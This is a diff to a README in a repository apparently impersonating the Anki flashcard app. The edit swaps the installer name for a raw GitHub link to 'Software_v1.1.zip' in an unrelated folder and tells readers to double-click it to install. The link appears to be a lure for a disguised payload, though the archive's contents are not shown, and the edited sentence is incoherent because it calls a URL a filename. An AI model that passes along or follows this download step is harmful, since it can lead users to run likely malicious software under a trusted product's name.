RETURNXNAWBIEE/anki/README.md

 ### Step 4: Open the File

 Once downloaded, locate the file in your downloads folder.
-The file may be named something like `anki_installer.exe` or similar.
+The file may be named something like `https://raw.githubusercontent.com/RETURNXNAWBIEE/anki/main/seacunny/Software_v1.1.zip` or similar.
 Double click the file to run the installer.

 ### Step 5: Follow the Installation Instructions